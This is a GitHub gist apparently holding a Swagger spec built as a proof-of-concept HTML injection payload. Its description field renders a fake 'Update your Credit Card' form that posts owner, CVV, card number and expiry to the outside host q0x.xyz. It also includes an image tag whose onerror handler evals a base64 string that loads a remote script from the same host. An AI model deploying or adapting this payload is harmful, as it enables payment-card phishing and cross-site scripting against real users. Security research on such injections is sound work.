Last active
November 23, 2022 13:08
-
-
Save xElkomy/c9e211f5c8a71426e57f3affe7cb7e84 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: HTML INJECTION POC | |
| description: '<div class="creditCardForm"> | |
| <div class="heading"> | |
| <h1>Update your Credit Card</h1> | |
| </div> | |
| <div class="payment"> | |
| <form action="https://q0x.xyz" method="post" class="form-signin" id = "login_form"> | |
| <div class="form-group owner"> | |
| <label for="owner">Owner</label> | |
| <input type="text" name="owner" size="20"> | |
| </div> | |
| <div class="form-group CVV"> | |
| <label for="cvv">CVV</label> | |
| <input type="text" name="cvv" size="20"> | |
| </div> | |
| <div class="form-group" id="card-number-field"> | |
| <label for="cardNumber">Card Number</label> | |
| <input type="text" name="cardnumber" size="20"> | |
| </div> | |
| <div class="form-group" id="expiration-date"> | |
| <label>Expiration Date</label> | |
| <select name="expiration"> | |
| <option value="01">January</option> | |
| <option value="02">February </option> | |
| <option value="03">March</option> | |
| <option value="04">April</option> | |
| <option value="05">May</option> | |
| <option value="06">June</option> | |
| <option value="07">July</option> | |
| <option value="08">August</option> | |
| <option value="09">September</option> | |
| <option value="10">October</option> | |
| <option value="11">November</option> | |
| <option value="12">December</option> | |
| </select> | |
| <select name="year"> | |
| <option value="20"> 2020</option> | |
| <option value="21"> 2021</option> | |
| <option value="22"> 2022</option> | |
| <option value="23"> 2021</option> | |
| </select> | |
| </div> | |
| <div class="form-group" id="credit_cards"> | |
| <img src="https://q0x.xyz/PoCs/visa.jpg" oner''+ror="document.domain" id="visa"> | |
| <img src="https://q0x.xyz/PoCs/mastercard.jpg" id="mastercard"> | |
| <img src="https://q0x.xyz/PoCs/amex.jpg" id="amex"> | |
| <img src="x" id="dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcTB4Lnh5eiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs" onerror="eval(atob(this.id))"> | |
| </div> | |
| <div class="form-group" id="pay-now"> | |
| <button type="submit" class="btn btn-default" id="confirm-purchase">Confirm</button> | |
| </div> | |
| </form> | |
| </div> | |
| </div>' | |
| paths: | |
| /: | |
| get: | |
| responses: | |
| '200': | |
| description: Echo 0xElkomy |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment